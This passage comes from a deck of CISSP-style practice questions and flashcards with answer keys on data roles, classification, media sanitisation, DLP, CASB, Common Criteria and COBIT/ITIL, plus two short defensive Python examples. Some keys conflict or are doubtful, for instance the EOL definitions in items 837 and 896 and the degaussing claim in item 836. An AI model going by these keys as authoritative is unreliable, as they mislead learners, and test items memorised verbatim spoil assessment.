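if __name__ == "__main__":
    pseudo, table = pseudonymise(SAMPLE)
    print(pseudo)                                  # aliases instead of name/email
    print(reidentify(pseudo, table) == SAMPLE)     # True: reversible -> still PII
    print(anonymise(SAMPLE))                       # no identifiers, no table
    print(minimise(SAMPLE))                        # only what the sale needs
    print(tokenise_card("4111111111111111"))       # tok_... ; PAN not in record
```

The practical check when someone claims data is "anonymized" is the first function: if any key or table exists anywhere in the organization that reverses the transformation, what they have is pseudonymized data and it stays in scope.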
831
You are performing an annual review of your company’s data policy, and you come across some confusing statements related to security labeling. Which of the following could you insert to describe security labeling accurately? A. Security labeling is only required on digital media. B. Security labeling identifies the classification of data. C. Security labeling is only required for hardware assets. D. Security labeling is never used for non sensitive data.
B. Security labeling identifies the classification of data such as sensitive, secret, and so on. Media holding sensitive data should be labeled. Similarly, systems that hold or process sensitive data should also be marked. Many organizations require the labeling of all systems and media, including those that hold or process non sensitive data.
832
A database file includes personally identifiable information (PII) on several individuals, including Karen C. Park. Which of the following is the best identifier for the record on Karen C. Park? A. Data controller B. Data subject C. Data processor D. Data owner
B. A data subject is a person who can be identified by an identifier such as a name, identification number, or other PII. All of these answers refer to the General Data Protection Regulation (GDPR). A data owner owns the data and has ultimate responsibility for protecting it. A data controller decides what data to process and how it should be processed. A data processor processes the data for the data controller.
833
Administrators regularly back up all the email servers within your company, and they routinely purge on-site emails older than six months to comply with the organization’s security policy. They keep a copy of the backups on site and send a copy to one of the company warehouses for long-term storage. Later, they discover that someone leaked sensitive emails sent between executives over three years ago. Of the following choices, what policy was ignored and allowed this data breach? A. Media destruction B. Record retention C. Configuration management D. Versioning
B. Personnel did not follow the record retention policy for the backups sent to the warehouse. The scenario states that administrators purge onsite emails older than six months to comply with the organization’s security policy, but the leak was from emails sent over three years ago. Personnel should follow media destruction policies when the organization no longer needs the media, but the issue here is the data on the tapes. Configuration management ensures that systems are configured correctly using a baseline, but this does not apply to backup media. Versioning applies to applications, not backup tapes.
834
An executive is reviewing governance and compliance issues and ensuring the security or data policy addresses them. Which of the following security controls is most likely driven by a legal requirement? A. Data remanence B. Record destruction C. Data user role D. Data retention
D. Record retention policies define the amount of time to keep data, and laws or regulations often drive these policies. Data remanence is data remnants on media, and proper data destruction procedures remove data remnants. Laws and regulations do outline requirements for some data roles, but they don’t specify requirements for the data user role.
835
Your organization is donating several computers to a local school. Some of these computers include solid-state drives (SSDs). Which of the following choices is the most reliable method of destroying data on these SSDs? A. Erasing B. Degaussing C. Deleting D. Purging
D. Purging is the most reliable method among the given choices. Purging overwrites the media with random bits multiple times and includes additional steps to ensure that data is removed. It ensures there isn't any data remanence. Erasing or deleting processes rarely remove the data from media but instead mark it for deletion. Solid-state drives (SSDs) do not have magnetic flux, so degaussing an SSD doesn't destroy data. Practitioner's caveat: because SSD firmware performs wear leveling, a host-side overwrite may never reach every flash block; the NIST SP 800-88 purge methods for flash media are the drive's built-in sanitize/block-erase command or cryptographic erase (destroying the key of a self-encrypting drive).
836
A technician is about to remove disk drives from several computers. His supervisor told him to ensure that the disk drives do not hold any sensitive data. Which of the following methods will meet the supervisor’s requirements? A. Overwriting the disks multiple times B. Formatting the disks C. Degaussing the disks D. Defragmenting the disks
A. Overwriting the disks multiple times will remove all existing data. This is called purging, and purged media can then be used again. Formatting the disks isn't secure because it doesn't typically remove the previously stored data. Degaussing the disks often damages the electronics but doesn't reliably remove the data. Defragmenting a disk optimizes it, but it doesn't remove data.
837
The IT department is updating the budget for the following year, and they want to include enough money for a hardware refresh for some older systems. Unfortunately, there is a limited budget. Which of the following should be a top priority? A. Systems with an end-of-life (EOL) date that occurs in the following year B. Systems used for data loss prevention C. Systems used to process sensitive data D. Systems with an end-of-support (EOS) date that occurs in the following year
D. Systems with an EOS date that occurs in the following year should be a top priority for replacement. The EOS date is the date that the vendor will stop supporting a product. The EOL date is the date that a vendor stops offering a product for sale, but the vendor continues to support the product until the EOS date. Systems used for data loss prevention or to process sensitive data can remain in service.
838
Developers created an application that routinely processes sensitive data. The data is encrypted and stored in a database. When the application processes the data, it retrieves it from the databases, decrypts it for use, and stores it in memory. Which of the following methods can protect the data in memory after the application uses it? A. Encrypt it with asymmetric encryption. B. Encrypt it in the database. C. Implement data loss prevention. D. Purge memory buffers
D. Purging memory buffers removes all remnants of data after a program has used it. Asymmetric encryption (along with symmetric encryption) protects data in transit. The data is already encrypted and stored in the database. The scenario doesn’t indicate that the program modified the data, so there’s no need to overwrite the existing data in the database. Data loss prevention methods prevent unauthorized data loss but do not protect data in use.
839
Your organization’s security policy mandates the use of symmetric encryption for sensitive data stored on servers. Which one of the following guidelines are they implementing? A. Protecting data at rest B. Protecting data in transit C. Protecting data in use D. Protecting the data lifecycle
A. Symmetric encryption methods protect data at rest, and data at rest is any data stored on media, such as a server. Data in transit is data transferred between two systems. Data in use is data in memory that is used by an application. Steps are taken to protect data from the time it is created to the time it is destroyed, but this question isn’t related to the data lifecycle.
840
An administrator is planning to deploy a database server and wants to ensure it is secure. She reviews a list of baseline security controls and identifies the security controls that apply to this database server. What is this called? A. Tokenization B. Scoping C. Standards selection D. Imaging
B. Scoping is a part of the tailoring process and refers to reviewing a list of security controls and selecting the security controls that apply. Tokenization is the use of a token, such as a random string of characters, to replace other data and is unrelated to this question. Note that scoping focuses on the security of the system and tailoring ensures that the selected controls align with the organization’s mission. If the database server needs to comply with external entities, it’s appropriate to select a standard baseline provided by that entity. Imaging is done to deploy an identical configuration to multiple systems, but this is typically done after identifying security controls.
841
An organization is planning to deploy an e-commerce site hosted on a web farm. IT administrators have identified a list of security controls they say will provide the best protection for this project. Management is now reviewing the list and removing any security controls that do not align with the organization’s mission. What is this called? A. Tailoring B. Sanitizing C. Asset classification D. Minimization
A. Tailoring refers to modifying a list of security controls to align with the organization's mission. The IT administrators identified a list of security controls to protect the web farm during the scoping steps. Sanitization methods (such as clearing, purging, and destroying) help ensure that data cannot be recovered and is unrelated to this question. Asset classification identifies the classification of assets based on the classification of data the assets hold or process. Minimization refers to data collection. Organizations should collect and maintain only the data they need.
842
An organization is planning to use a cloud provider to store some data. Management wants to ensure that all data-based security policies implemented in the organization’s internal network can also be implemented in the cloud. Which of the following will support this goal? A. CASB B. DLP C. DRM D. EOL
A. A cloud access security broker (CASB) is software placed logically between users and cloud-based resources, and it can enforce security policies used in an internal network. Data loss prevention (DLP) systems attempt to detect and block data exfiltration. CASB systems typically include DLP capabilities. Digital rights management (DRM) methods attempt to provide copyright protection for copyrighted works. End-of-life (EOL) is generally a marketing term and indicates when a company stops selling a product.
843
Management is concerned that users may be inadvertently transmitting sensitive data outside the organization. They want to implement a method to detect and prevent this from happening. Which of the following can detect outgoing, sensitive data based on specific data patterns and is the best choice to meet these requirements? A. Antimalware software B. Data loss prevention systems C. Security information and event management systems D. Intrusion prevention systems
B. Network-based data loss prevention (DLP) systems can scan outgoing data and look for specific keywords and/or data patterns. DLP systems can block these outgoing transmissions. Antimalware software detects malware. Security information and event management (SIEM) provides real-time analysis of events occurring on systems throughout an organization but doesn’t necessarily scan outgoing traffic. Intrusion prevention systems (IPSs) scan incoming traffic to prevent unauthorized intrusions.
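The pattern matching that answer describes, as an added example that is not from the flashcard source: a minimal outbound-content check of the kind a network DLP engine runs, looking for card numbers (with a Luhn check so that order and ticket numbers do not trigger it), US SSN-shaped strings, and classification keywords, then masking what it reports so the alert itself does not leak the data. The messages are constructed, and the card number is the well-known Visa test number, not a live account.

```python
# Added illustration (not from the flashcard source): outbound DLP content
# inspection over constructed sample messages. 4111 1111 1111 1111 is the
# public Visa test number; no real account data is present.
import re

PAN_RE = re.compile(r"\b(?:\d[ -]?){12,18}\d\b")   # 13-19 digits, optional separators
SSN_RE = re.compile(r"\b\d{3}-\d{2}-\d{4}\b")
KEYWORDS = ("confidential", "internal only")

def luhn_ok(digits: str) -> bool:
    """Luhn checksum: doubles every second digit from the right."""
    total, parity = 0, len(digits) % 2
    for i, ch in enumerate(digits):
        d = int(ch)
        if i % 2 == parity:
            d = d * 2 if d < 5 else d * 2 - 9
        total += d
    return total % 10 == 0

def findings(text: str) -> list:
    """Return (category, masked_value) pairs for everything the policy flags.
    Values are masked because the alert log must not become a second leak."""
    hits = []
    for m in PAN_RE.finditer(text):
        digits = re.sub(r"[ -]", "", m.group())
        if luhn_ok(digits):                        # cuts false positives on plain numbers
            hits.append(("PAN", digits[:6] + "*" * (len(digits) - 10) + digits[-4:]))
    for m in SSN_RE.finditer(text):
        hits.append(("SSN", "***-**-" + m.group()[-4:]))
    low = text.lower()
    hits += [("KEYWORD", k) for k in KEYWORDS if k in low]
    return hits

def decision(text: str) -> str:
    """Blocking mode; a monitoring-only deployment would log and ALLOW."""
    return "BLOCK" if findings(text) else "ALLOW"

OUTBOUND = [                                       # constructed sample messages
    "Q3 numbers attached, INTERNAL ONLY - do not forward",
    "Order 4111 1111 1111 1111 shipped, thanks!",
    "Ticket ref 1234567890123456 closed",          # 16 digits but fails Luhn
    "Lunch at noon?",
]

if __name__ == "__main__":
    for msg in OUTBOUND:
        print(f"{decision(msg):5}  {findings(msg)}  <- {msg}")
```

Two things this makes concrete about the answer: detection is on data patterns, so it works on the body of any protocol the proxy can see in clear (which is why DLP sits behind TLS termination), and a validator such as Luhn matters as much as the regex, because a pattern-only rule blocks legitimate traffic and trains users to route around the control.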
844
A software developer created an application and wants to protect it with DRM technologies. Which of the following is she most likely to include? (Choose three.) A. Virtual licensing B. Persistent online authentication C. Automatic expiration D. Continuous audit trail
B, C, D. Persistent online authentication, automatic expiration, and a continuous audit trail are all methods used with digital rights management (DRM) technologies. Virtual licensing isn’t a valid term within DRM
845
A company outsources payroll services to a third-party company. Which of the following roles most likely applies to the third-party payroll company? A. Data controller B. Data hander C. Data owner D. Data processor
D. A third-party payroll company is a data processor: it processes personal data on behalf of, and on the instructions of, the data controller. Incorrect answers and explanations: Answers A, B, and C are incorrect. A data controller is someone who creates PII, such as an HR department. "Data handler" is not a formal term and is a distractor answer. A data owner is a management employee responsible for assuring that specific data is protected.
846
Which managerial role is responsible for the actual computers that house data, including the security of hardware and software configurations? A. Custodian B. Data owner C. Mission owner D. System owner
D. A system owner is responsible for the actual computers that house data, including the security of hardware and software configurations. Incorrect answers and explanations: Answers A, B, and C are incorrect. A custodian is a nonmanager who provides hands-on protection of assets. A data owner is a manager responsible for assuring that specific data is protected. A mission owner is a member of senior management who creates the information security program and ensures that it is properly staffed and funded and has the appropriate organizational priority.
847
What method destroys the integrity of magnetic media, such as tapes or disk drives, and the data they contain by exposing them to a strong magnetic field? A. Bit-level overwrite B. Degaussing C. Destruction D. Shredding
B. Degaussing destroys the integrity of magnetic media, such as tapes or disk drives, and the data they contain by exposing them to a strong magnetic field. Incorrect answers and explanations: Answers A, C, and D are incorrect. A bit level overwrite removes data by overwriting every sector of a disk. Destruction physically destroys data; for example, via incineration. Shredding electronic data involves overwriting a file’s contents before deleting the file.
848
What type of relatively expensive and fast memory uses small latches called “flip-flops” to store bits? A. DRAM B. EPROM C. SRAM D. SSD
C. SRAM is relatively expensive and fast memory that uses small latches called "flip-flops" to store bits. Incorrect answers and explanations: Answers A, B, and D are incorrect. DRAM is relatively inexpensive memory that uses capacitors. EPROM may be erased with ultraviolet light. An SSD is a combination of DRAM and EEPROM.
849
What type of memory stores bits in small capacitors (like small batteries)? A. DRAM B. EPROM C. SRAM D. SSD
A. DRAM stores bits in small capacitors (like small batteries). Incorrect answers and explanations: Answers B, C, and D are incorrect. EPROM may be erased with ultraviolet light. SRAM is relatively expensive and fast memory that uses small latches called "flip-flops" to store bits. An SSD is a combination of DRAM and EEPROM.
850
The International Common Criteria is an internationally agreed-upon standard for describing and testing the security of information technology (IT) products. It presents a hierarchy of requirements for a range of classifications and systems. The Common Criteria uses specific terms when defining specific portions of the testing process. * Target of evaluation (ToE): The system or product that is being evaluated * Security target: The documentation describing the ToE, including the security requirements and operational environment * Protection profile: An independent set of security requirements and objectives for a specific category of products or systems, such as firewalls or intrusion detection systems * Evaluation assurance level (EAL): The evaluation score of the tested product or system
851
In the Common Criteria, "the system or product that is being evaluated"

Target of evaluation
Security target
Protection profile
Evaluation assurance level (EAL)
Target of evaluation (ToE)
852
In the Common Criteria, "the documentation describing the ToE, including the security requirements and operational environment"

Target of evaluation
Security target
Protection profile
Evaluation assurance level (EAL)
Security target
853
In the Common Criteria, "An independent set of security requirements and objectives for a specific category of products or systems, such as firewalls or intrusion detection systems"

Target of evaluation
Security target
Protection profile
Evaluation assurance level (EAL)
Protection profile
854
In the Common Criteria, "The evaluation score of the tested product or system"

Target of evaluation
Security target
Protection profile
Evaluation assurance level (EAL)
Evaluation assurance level (EAL)
855
How many EALs exist within the Common Criteria?

3
5
7
7
856
The Common Criteria "Structurally tested"

EAL1
EAL2
EAL3
EAL4
EAL5
EAL6
EAL7
EAL2
857
The Common Criteria "Methodically tested and checked"

EAL1
EAL2
EAL3
EAL4
EAL5
EAL6
EAL7
EAL3
858
The Common Criteria "Methodically designed, tested, and reviewed"

EAL1
EAL2
EAL3
EAL4
EAL5
EAL6
EAL7
EAL4
859
The Common Criteria "Semiformally designed and tested"

EAL1
EAL2
EAL3
EAL4
EAL5
EAL6
EAL7
EAL5
860
The Common Criteria "Semiformally verified, designed, and tested"

EAL1
EAL2
EAL3
EAL4
EAL5
EAL6
EAL7
EAL6
861
The Common Criteria "Formally verified, designed, and tested"

EAL1
EAL2
EAL3
EAL4
EAL5
EAL6
EAL7
EAL7
862
COBIT is a control framework for employing information security governance best practices within an organization. COBIT was developed by ISACA (Information Systems Audit and Control Association). How many IT processes exist in COBIT?

7
14
28
34
34
863
COBIT is a control framework for employing information security governance best practices within an organization. COBIT was developed by ISACA (Information Systems Audit and Control Association). COBIT has four domains; this domain is number four.

Plan and Organize
Acquire and Implement
Deliver and Support
Monitor and Evaluate
Monitor and Evaluate
864
COBIT is a control framework for employing information security governance best practices within an organization. COBIT was developed by ISACA (Information Systems Audit and Control Association). COBIT has four domains; this domain is number one.

Plan and Organize
Acquire and Implement
Deliver and Support
Monitor and Evaluate
Plan and Organize
865
COBIT is a control framework for employing information security governance best practices within an organization. COBIT was developed by ISACA (Information Systems Audit and Control Association). COBIT has four domains; this domain is number two.

Plan and Organize
Acquire and Implement
Deliver and Support
Monitor and Evaluate
Acquire and Implement
866
COBIT is a control framework for employing information security governance best practices within an organization. COBIT was developed by ISACA (Information Systems Audit and Control Association). COBIT has four domains; this domain is number three.

Plan and Organize
Acquire and Implement
Deliver and Support
Monitor and Evaluate
Deliver and Support
867
ITIL is a framework for providing best services in IT Service Management. ITIL contains five Service Management Practices; this practice "helps IT provide services".

Service Design
Service Transition
Service Operation
Continual Service Improvement
Service Strategy
Service Strategy
868
ITIL is a framework for providing best services in IT Service Management. ITIL contains five Service Management Practices; this practice "details the infrastructure and architecture required to deliver IT services".

Service Design
Service Transition
Service Operation
Continual Service Improvement
Service Design
869
ITIL is a framework for providing best services in IT Service Management. ITIL contains five Service Management Practices; this practice "describes taking new projects and making them operational".

Service Design
Service Transition
Service Operation
Continual Service Improvement
Service Transition
870
ITIL is a framework for providing best services in IT Service Management. ITIL contains five Service Management Practices; this practice "covers IT operations controls".

Service Design
Service Transition
Service Operation
Continual Service Improvement
Service Operation
871
ITIL is a framework for providing best services in IT Service Management. ITIL contains five Service Management Practices; this practice "describes ways to improve existing IT services".

Service Design
Service Transition
Service Operation
Continual Service Improvement
Continual Service Improvement
872
In the context of IT management and governance, the Control Objectives for Information and Related Technology (COBIT) framework serves as a valuable tool. Who among the following roles would typically choose and utilize the COBIT framework to balance security controls and business requirements? A. Data owners B. Information stewards C. Enterprise owners D. Data custodians
Answer: C. Enterprise owners Explanation: Enterprise or business owners are the most likely to select and apply the COBIT framework. COBIT allows them to govern and manage the IT environment to ensure that business needs, such as risk management, resource optimization, and value creation, are met effectively. While all roles may interact with COBIT somehow, the business owners are primarily responsible for aligning security controls with business requirements. Data processors, information stewards, and data custodians focus more on the operational aspects of data and may not be involved in strategic decision-making processes like selecting a governance framework.
873
An enterprise operates in a hybrid cloud environment, employing on-site and cloud-based systems. It has adequate on-site monitoring but needs to impose security policies on user activities and report exceptions in its increasing number of cloud services. What kind of tool would be most suitable for this requirement? A. A Next-Generation Firewall (NGFW) B. A Cloud Access Security Broker (CASB) C. An Intrusion Detection System (IDS) D. A Security Orchestration, Automation, and Response (SOAR) tool
Answer: B. A Cloud Access Security Broker (CASB) Explanation: A Cloud Access Security Broker (CASB) is a tool that sits between cloud service consumers and cloud service providers to enforce security, compliance, and governance policies for cloud applications. It can help monitor and secure the hybrid cloud environment.
874
In data handling, when media is tagged based on the classification of the data it houses, what principle is generally enforced about labels? A. The data is marked according to its integrity requisites. B. The media is tagged based on the highest classification tier of the data it accommodates. C. The media is tagged with all tiers of classification of the data it accommodates. D. The media is tagged with the lowest tier of classification of the data it accommodates.
Answer: B. The media is tagged based on the highest classification tier of the data it accommodates. Explanation: When labeling media based on the classification of the data it contains, the rule typically applied is to label it based on the highest classification level of the data. This ensures the most restrictive and appropriate controls are applied to protect the entire dataset.
875
Among the following administrative processes, which one aids organizations in allocating suitable security control levels to sensitive data? A. Data categorization B. Remanence C. Data transmission D. Clearing
Answer: A. Data categorization Explanation: Data classification, or categorization, is an administrative process that involves sorting data into categories based on its sensitivity level. This aids organizations in assigning appropriate levels of security controls to sensitive information, ensuring that each type of data is adequately protected according to its value and sensitivity.
876
What term refers to the kind of information kept about an individual that can be utilized to distinguish or trace their identity? A. Personally Identifiable Information (PII) B. Personal Health Information (PHI) C. Social Security Number (SSN) D. Secure Identity Information (SII)
Answer: A. Personally Identifiable Information (PII) Explanation: Personally Identifiable Information (PII) is any data that could identify a specific individual. It includes any information that can be used to distinguish or trace an individual’s identity, such as name, social security number, date and place of birth, mother’s maiden name, or biometric records.
877
Among the following information security risks to data at rest, which one would inflict the most substantial reputational damage to an organization? A. Incorrect classification B. Data breach C. Decryption D. A deliberate insider threat
Answer: B. Data breach Explanation: A data breach involving unauthorized access and retrieval of sensitive information often has the most significant reputational impact on an organization. It can lead to losing trust among customers and stakeholders, legal repercussions, and financial losses.
878
Tools like Microsoft’s BitLocker, which employs full disk encryption, are utilized to protect data in what state? A. Data in transit B. Data at rest C. Unlabeled data D. Labeled data
Answer: B. Data at rest Explanation: Full disk encryption tools like BitLocker are used to protect data at rest, that is, data that is stored on physical or virtual disk drives, storage devices, or other types of media.
879
An employer issues mobile phones to its staff for work purposes and renews the devices every two years. How would you describe this practice if the phones are still operational and receiving system updates? A. End of Life (EOL) B. Planned obsolescence C. End of Support (EOS) D. Device risk management
Answer: B. Planned obsolescence Explanation: Planned obsolescence is a policy of planning or designing a product with an artificially limited useful life or a purposely frail design, so it becomes outdated or nonfunctional after a certain period. In this case, even though the phones are still operational and receiving updates, they are replaced every two years. This is a form of planned obsolescence, where the company ensures that the old devices are phased out and replaced, even though they might still be usable. EOL is when the device is no longer suitable for use and is discarded. EOS means that the manufacturer has stopped providing updates or fixes for the product. Device risk management is a process to identify, assess, and prioritize the risks associated with using devices in an organization. None of these options describes the scenario as accurately as planned obsolescence.
880
What is the primary objective of data classification? A. It quantifies the cost of a data breach. B. It prioritizes IT expenditures. C. It enables compliance with breach notification laws. D. It identifies the value of the data to the organization.
Answer: D. It identifies the value of the data to the organization. Explanation: The primary purpose of data classification is to identify the value of the data to the organization. This process involves categorizing data based on its sensitivity level and importance to the organization, which helps implement appropriate security controls and handling procedures.
881
What action is required to protect information and assets? A. Risk assessment B. Data categorization C. Asset identification D. Asset and information classification
Answer: D. Asset and information classification Explanation: Identifying and classifying information and assets is a key step in managing security risks. This process helps prioritize resources, apply appropriate protections, and comply with legal and regulatory requirements.
882
What term refers to organizing data based on its sensitivity and the impact on the business if compromised? A. Data processing B. Data classification C. Data optimization D. Data indexing
Answer: B. Data classification Explanation: Data classification categorizes data into types, forms, or other distinct classes. This classification may be based on data sensitivity such as private, confidential, public, or the data’s importance to the organization.
883
What term refers to the process of identifying and categorizing an organization’s resources? A. Resource classification B. Asset classification C. Asset allocation D. Resource allocation
Answer: B. Asset classification Explanation: Asset classification defines an organization’s assets based on their criticality, sensitivity, and other factors. This helps organizations apply appropriate security measures and prioritize their resources.
884
What process involves setting the rules for how to deal with and manage information and assets within an organization? A. Establishing data retrieval protocol B. Setting information and asset handling guidelines C. Creating data backup plan D. Setting asset management policy
Answer: B. Setting information and asset handling guidelines Explanation: Establishing information and asset handling requirements means setting up policies and procedures determining how data and assets should be managed, stored, transmitted, and disposed of. This is an essential part of an organization’s information security strategy, helping to ensure that sensitive information and valuable assets are appropriately protected.
885
What process involves the secure allocation of resources, assigning ownership, and managing inventory of tangible and intangible assets? A. Asset management and secure provisioning B. Information security audit C. Network monitoring D. Data backup and restoration
Answer: A. Asset management and secure provisioning Explanation: Asset management and secure provisioning encompass the secure allocation of resources, identifying and assigning ownership of information and assets, and maintaining a comprehensive inventory of tangible and intangible assets. This helps provide an organized view of the company’s resources and assists in maintaining proper security controls.
886
What role in data management is responsible for the safe custody, transport, and storage of the data? A. Data controller B. Data processor C. Data owner D. Data custodian
Answer: D. Data custodian Explanation: A data custodian is responsible for the data’s safe custody, transport, and storage. They maintain the integrity, confidentiality, and availability of the data.
887
Which term refers to the residual representation of data that remains even after attempts have been made to remove or erase the data? A. Data retention B. Data remanence C. Data collection D. Data location
Answer: B. Data remanence Explanation: Data remanence is the residual representation of data nominally erased or removed.
888
What is the process of acquiring data for initial use? A. Data retention B. Data location C. Data collection D.Data destruction
Answer: C. Data collection Explanation: Data collection is the process of gathering and measuring information on targeted variables in an established system, enabling one to answer relevant questions and evaluate outcomes.
889
Which term refers to the procedures that keep data for a predetermined period of time, after which it is discarded? A. Data remanence B. Data retention C. Data collection D. Data maintenance
Answer: B. Data retention Explanation: Data retention involves policies and strategies to keep data for compliance or business reasons. After the predetermined period, the data is discarded.
890
What process ensures data is accurate, consistent, and reliable throughout its life cycle? A. Data collection B. Data maintenance C. Data retention D. Data destruction
Answer: B. Data maintenance Explanation: Data maintenance involves maintaining data assets by ensuring data accuracy, consistency, and reliability throughout its life cycle.
891
Who decides who, what, when, where, and how data should be used or shared? A. Data custodian B. Data controller C. Data processor D. Data owner
Answer: D. Data owner Explanation: The data owner is typically a senior executive with legal authority and responsibility for a dataset.
892
Which term refers to the physical or virtual location where data is stored? A. Data collection B. Data location C. Data maintenance D. Data remanence
Answer: B. Data location Explanation: Data location refers to the physical or virtual place where data is stored, such as in-house servers, data centers, or cloud storage.
893
Who is responsible for processing personal data on behalf of the controller? A. Data custodian B. Data controller C. Data processor D. Data owner
Answer: C. Data processor Explanation: A data processor is responsible for processing personal data on behalf of the controller.
894
Which term refers to eliminating data stored on memory devices, ensuring that the data is completely unreadable? A. Data collection B. Data retention C. Data destruction D. Data location
Answer: C. Data destruction Explanation: Data destruction is destroying data stored on tapes, hard disks, and other electronic media so that it is completely unreadable and cannot be accessed or used for unauthorized purposes.
895
Who is the person that determines the purposes for which and how personal data is processed? A. Data owner B. Data custodian C. Data controller D. Data processor
Answer: C. Data controller Explanation: The data controller is the person (or business) who determines the purposes for which and how personal data is processed. They are responsible for establishing practices and policies in line with regulations to protect the data they are handling.
896
What does the term “End-of-Life” (EOL) typically refer to in the context of asset retention? A. The period when an asset is fully depreciated B. The point at which the manufacturer no longer supports an asset C. The time when an asset is no longer useful for the organization and is disposed of D. The stage when an asset is upgraded or replaced with a newer model
Answer: C. The time when an asset is no longer useful for the organization and is disposed of Explanation: EOL generally refers to a stage in the asset’s life cycle when it is no longer beneficial or productive for the organization. This could be due to obsolescence, failure, or when it is more cost effective to replace the asset than to continue maintaining it.
897
What is the primary concern when a software asset reaches its End-of-Support (EOS) stage? A. The software will no longer function. B. The software may no longer receive security updates and patches. C. The software will be incompatible with newer systems. D. The software will automatically uninstall itself.
Answer: B. The software may no longer receive security updates and patches. Explanation: When software reaches its EOS stage, the manufacturer or provider typically stops providing updates, patches, or fixes, including security-related ones. This can leave the software vulnerable to security threats and affect compliance with certain regulations.
898
What is the primary purpose of establishing an asset retention policy in an organization? A. To ensure data is never deleted B. To prevent theft of organizational assets C. To ensure compliance with legal and regulatory requirements for data retention D. To ensure all assets are utilized to their fullest potential
Answer: C. To ensure compliance with legal and regulatory requirements for data retention Explanation: Asset retention policies are primarily designed to ensure that organizations comply with applicable legal and regulatory requirements. These requirements often specify how long certain data types must be retained and how they should be securely disposed of when no longer needed.
899
In the context of data management, what is the main reason for properly managing an asset’s End-of-Life (EOL) stage? A. To maximize the asset’s value B. To ensure data contained on the asset is properly backed up C. To prevent unauthorized access or data breaches D. To ensure the asset can be reused
Answer: C. To prevent unauthorized access or data breaches Explanation: When an asset reaches its End-of-Life (EOL) stage, it’s crucial to ensure that all data on the asset is either transferred or destroyed appropriately. If not managed correctly, it can lead to unauthorized access or data breaches, which can have significant consequences for the organization.
900
Which of the following is a best practice for managing assets that have reached their End-of-Support (EOS) stage? A. Continue using them as long as they still function B. Replace them with the latest models available C. Isolate them from the network and use them offline D. Evaluate risks associated with continued use and plan for their replacement or upgrade
Answer: D. Evaluate risks associated with continued use and plan for their replacement or upgrade Explanation: When assets reach their EOS stage, evaluating the risks associated with their continued use is essential. These might include security vulnerabilities due to a lack of updates or incompatibility issues with other systems. Based on this evaluation, a plan should be made for replacing or upgrading the assets.
901
What are the three states of data that need to be secured? A. Loaded, running, and unloaded B. In use, in transit, and at rest C. In motion, in storage, and processing D. Active, passive, and idle
Answer: B. In use, in transit, and at rest Explanation: The three states of data that need to be considered when securing data are “in use” (data being processed), “in transit” (data being moved from one location to another), and “at rest” (data that is stored).
902
What is the purpose of scoping and tailoring in the context of data security controls? A. To customize security controls to fit the specific needs of the organization B. To reduce the number of security controls applied to data C. To expand the range of security controls applied to data D. To standardize security controls across different types of data
Answer: A. To customize security controls to fit the specific needs of the organization Explanation: Scoping and tailoring is adjusting a set of standard security controls to fit an organization’s specific needs better. This may involve adding, modifying, or removing specific controls based on the organization’s unique risk environment and business requirements.
903
What is the purpose of Digital Rights Management (DRM)? A. To prevent unauthorized access to digital media B. To facilitate the sharing of digital media C. To track the usage of digital media D. All of the above
Answer: D. All of the above Explanation: DRM is a technology used to protect digital media copyrights. It can prevent unauthorized access, track digital media usage, and control how digital media is shared.
904
How does a Cloud Access Security Broker (CASB) contribute to data security? A. By providing a security layer between users and cloud service providers B. By encrypting data stored in the cloud C. By monitoring user activity in the cloud D. All of the above
Answer: D. All of the above Explanation: A CASB is a software tool or service that sits between an organization’s on-premises infrastructure and the cloud provider’s infrastructure. A CASB can provide various services, including encrypting data, monitoring for malicious activity, and enforcing security compliance policies.
905
What is the primary goal of data loss prevention (DLP)? A. To prevent data breaches by detecting potential data breach/data ex-filtration transmissions B. To recover data that has been lost due to hardware failure C. To manage access rights to data D. To provide an audit trail of data access
Answer: A. To prevent data breaches by detecting potential data breach/data ex-filtration transmissions Explanation: DLP ensures that end users do not send sensitive or critical information outside the corporate network. The term also describes software products that help a network administrator control what data end users can transfer.
906
What process involves analyzing retained data, determining its importance and value, and categorizing it accordingly? A. Implementing data security controls B. Setting data standards C. Acting as data custodians D. Conducting data classification
Answer: D. Conducting data classification Explanation: Data classification involves analyzing an organization’s data, determining its importance and value, and then categorizing it accordingly. This process is crucial for effective data management and protection.
907
What term refers to the process of removing sensitive data from storage devices in a way that prevents its reconstruction through standard system functions or software file/data recovery utilities? A. Clearing B. Utilizing self-encrypting USB drives C. Purging D. Conducting data modeling
Answer: C. Purging Explanation: Purging refers to securely removing sensitive data from storage devices so that it cannot be recovered using normal system functions or software file/data recovery utilities.
908
What provides more flexibility in applying encryption to specific files? A. File encryption software B. Categorization C. Self-encrypting USB drives D. Media encryption software
Answer: A. File encryption software Explanation: File encryption software allows for the encryption of specific files, providing flexibility in securing particular data elements.
909
What term describes the pivotal point where a material’s inherent magnetic alignment changes direction? A. Data remanence B. Clearing C. Media encryption software D. Curie temperature
Answer: D. Curie temperature Explanation: The Curie temperature is the critical point where a material’s intrinsic magnetic alignment changes direction. This concept is relevant in data storage technologies that use magnetic storage media.
910
What role ensures crucial datasets are developed, maintained, and accessible within their specified parameters? A. Conducting data classification B. Undertaking data modeling C. Serving as data custodians D. Implementing data security controls
Answer: C. Serving as data custodians Explanation: Data custodians ensure that important datasets are developed, maintained, and accessible within their specifications. This role is crucial in an organization’s overall data management and protection strategy.
911
In the context of US government document classifications, which signifies the least sensitive level? A. Confidential B. Top Secret C. Top Secret D. Secret
Answer: A. Confidential Explanation: The US government ranks the sensitivity of information into several levels: Top Secret, Secret, and Confidential. Of these, Confidential is considered the lowest level of sensitivity.
912
Which law in Europe is responsible for the protection of personal data privacy? A. HIPAA B. GLBA C. GDPR D. DPD
Answer: C. GDPR Explanation: The General Data Protection Regulation (GDPR) is the primary law in Europe regulating how companies protect EU citizens’ personal data.
913
The TLS protocol is most effective for safeguarding which type of data? A. Data in motion B. Data in use C. Data at rest D. Data in an archived status
Answer: A. Data in motion Explanation: The Transport Layer Security (TLS) protocol is primarily designed to provide privacy and data integrity between two or more communicating computer applications, making it suitable for securing data in motion.
914
Which protocol should you opt for if you want to replace an old Telnet server with a secure alternative? A. SCP B. HTTPS C. SSH D. SFTP
Answer: C. SSH Explanation: SSH (Secure Shell) is a secure protocol that can replace Telnet for secure server management.
915
Which of the following is considered the least secure method for removing data from magnetic media? A. Destruction B. Degaussing C. Purging D. Erasing
Answer: D. Erasing Explanation: Of the methods listed, erasing is generally the least secure method for data removal from magnetic media. It simply removes the pointers to the data but does not physically erase the data itself.
916
Which of the following locations exemplifies “data in use”? A. RAM B. Network transmission C. SSD D. Magnetic disk
